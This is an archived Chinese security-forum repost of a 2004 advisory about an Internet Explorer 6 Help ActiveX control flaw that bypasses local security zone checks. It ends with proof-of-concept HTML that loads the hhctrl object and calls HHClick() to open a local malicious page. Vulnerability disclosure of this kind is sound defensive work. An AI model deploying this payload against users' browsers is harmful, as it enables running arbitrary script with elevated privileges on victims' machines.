邪恶八进制信息安全团队技术讨论组 » 重要安全公告{ Security Advisory Bulletin } » 漏洞分析[ Vulnerability Analyse ] » [转载]Internet Explorer Help ActiveX控件本地安全域绕过漏洞 [查看完整版本]

冰血封情 2004-12-30 12:40

[转载]Internet Explorer Help ActiveX控件本地安全域绕过漏洞

信息来源：nsfocus

发布日期：2004-12-18
更新日期：2004-12-21

受影响系统：
Microsoft Internet Explorer 6.0
   - Microsoft Windows XP Professional
   - Microsoft Windows XP Home
   - Microsoft Windows NT 4.0 SP6a
   - Microsoft Windows ME
   - Microsoft Windows 98 SE
   - Microsoft Windows 98
   - Microsoft Windows 2000
描述：
--------------------------------------------------------------------------------
Microsoft Internet Explorer是一款流行的WEB浏览器。

Microsoft Internet Explorer帮助控件存在问题，远程攻击者可以利用这个漏洞绕过本地安全域限制。

利用MSIE帮助控件，建立恶意页面，诱使用户访问，可以导致绕过本地安全域检查，以高权限执行任意脚本内容。

<*来源：Paul （[email]paul@greyhats.cjb.net[/email]）
  
  链接：[url]http://marc.theaimsgroup.com/?l=bugtraq&m=110356607505041&w=2[/url]
*>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Paul （[email]paul@greyhats.cjb.net[/email]）提供了如下测试代码：
[code]<OBJECT id="hhctrl" type="application/x-oleobject" \
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"codebase="hhctrl.ocx#Version=5,2,3 \
790,1194"width=7% height=7% style="position:absolute;top:140;left:72;z-index:100;"> \
<PARAM name="Command" value="Related Topics, MENU"> <PARAM name="Button" \
value="Text:Just a button"> <PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value="command;C:\WINDOWS\PCHealth\malwarez[1].htm">
</OBJECT>
<script>
hhctrl.HHClick();
</script>[/code]

查看完整版本: [转载]Internet Explorer Help ActiveX控件本地安全域绕过漏洞

© 1999-2008 EvilOctal Security Team